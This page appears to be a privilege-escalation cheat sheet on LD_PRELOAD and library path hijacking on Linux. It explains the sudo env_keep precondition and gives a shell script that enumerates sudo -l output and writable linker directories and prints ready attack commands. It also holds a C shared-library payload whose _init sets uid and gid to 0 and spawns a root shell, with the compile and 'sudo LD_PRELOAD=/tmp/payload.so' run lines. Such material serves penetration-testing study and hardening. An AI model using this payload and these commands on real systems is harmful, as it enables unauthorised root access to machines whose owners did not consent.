Path Hijacking

LD_PRELOAD

Check whether you can write into a directory on the library search path used by privileged binaries (for example a directory listed in /etc/ld.so.conf or /etc/ld.so.conf.d/, or a writable RPATH); if so you may be able to abuse the library load order. Check which functions a binary imports with objdump -T <binary> (the *UND* entries are the symbols a preloaded library can interpose). For these preload attacks to work through sudo, /etc/sudoers must keep the variable across the sudo boundary, i.e. contain Defaults env_keep += LD_PRELOAD; sudo -l shows whether that is the case. Note that in secure-execution mode (a set-user-ID binary run directly) the dynamic loader ignores LD_PRELOAD entries that contain a slash, so the sudo env_keep rule is what makes this attack possible.
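The checks above, as an added shell example that is not part of the original page: it parses sudo -l output for env_keep+=LD_PRELOAD and the commands the user may run, lists the writable directories named in the linker configuration, and (when objdump is installed) prints the imported symbols of a target. The sudo -l text embedded below is constructed for the example, and the payload path /tmp/payload.so is assumed to match the compile step further down.

```shell
#!/bin/sh
# Added example (not from the original page): enumerate the preconditions for
# an LD_PRELOAD attack from `sudo -l` output and the linker configuration.
# SAMPLE_SUDO_L is constructed for this example; a real run uses `sudo -l`.

SAMPLE_SUDO_L='Matching Defaults entries for alice on box:
    env_reset, env_keep+=LD_PRELOAD, secure_path=/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on box:
    (root) NOPASSWD: /usr/bin/find
    (root) /usr/sbin/iptables -L'

# Return 0 if the sudoers Defaults shown by `sudo -l` keep LD_PRELOAD.
sudo_keeps_ld_preload() {
    printf '%s\n' "$1" | grep -Eq 'env_keep\+?=[^,]*LD_PRELOAD'
}

# Print the binaries the user may run through sudo, one per line
# (strips the "(user)" prefix and an optional NOPASSWD: tag).
sudo_targets() {
    printf '%s\n' "$1" |
    sed -n 's/^[[:space:]]*([^)]*)[[:space:]]*\(NOPASSWD:[[:space:]]*\)\{0,1\}\([^ ]*\).*/\2/p'
}

# Print the directories named in ld.so.conf and ld.so.conf.d/*.conf that the
# current user can write to. $1 is the config root (default /etc) so the
# function can be pointed at a test tree.
writable_ld_dirs() {
    conf_root=${1:-/etc}
    cat "$conf_root/ld.so.conf" "$conf_root"/ld.so.conf.d/*.conf 2>/dev/null |
    grep -Ev '^[[:space:]]*(#|include|$)' |
    while IFS= read -r dir; do
        if [ -d "$dir" ] && [ -w "$dir" ]; then printf '%s\n' "$dir"; fi
    done
}

# List the dynamically imported (undefined) symbols of a binary: these are the
# functions a preloaded library can interpose. Requires binutils' objdump.
imported_symbols() {
    command -v objdump >/dev/null 2>&1 || { echo "objdump not found" >&2; return 1; }
    objdump -T "$1" 2>/dev/null | grep '\*UND\*' | awk '{print $NF}' | sort -u
}

# Summarise the findings for one `sudo -l` text. The payload path is an
# assumption taken from the compile step on this page.
report() {
    if sudo_keeps_ld_preload "$1"; then
        echo "[+] LD_PRELOAD is kept across sudo"
        for t in $(sudo_targets "$1"); do
            echo "    try: sudo LD_PRELOAD=/tmp/payload.so $t"
        done
    else
        echo "[-] LD_PRELOAD is not kept; look for writable library directories instead"
    fi
    writable_ld_dirs | sed 's/^/[+] writable linker search dir: /'
}

# Stand-alone run on the constructed sample; pass a file holding real
# `sudo -l` output as $1 to use that instead.
if [ -n "${1:-}" ]; then SAMPLE_SUDO_L=$(cat "$1"); fi
report "$SAMPLE_SUDO_L"
```

On a real target run sudo -l > /tmp/sudo-l.txt and feed that file to the script; then call imported_symbols on each listed binary to pick a symbol to interpose if the simple _init approach is not an option.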

Preload example payload

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* With -nostartfiles the library gets no crti.o, so this _init becomes the
 * shared object's initialisation routine and runs as soon as the loader maps it,
 * before the target's main(). */
void _init() {
  unsetenv("LD_PRELOAD");   /* keep the spawned shell from preloading us again */
  setgid(0);
  setuid(0);
  system("/bin/sh");
}

Compile preload example payload

gcc -fPIC -shared -o /tmp/payload.so payload.c -nostartfiles
sudo LD_PRELOAD=/tmp/payload.so <target>

The path given to LD_PRELOAD must be the one the library was compiled to, and <target> must be a command sudo allows you to run (see sudo -l).

When you change the linker configuration (/etc/ld.so.conf or files in /etc/ld.so.conf.d/), run ldconfig afterwards; otherwise the linker cache (/etc/ld.so.cache) is not updated and the new search path is not used.
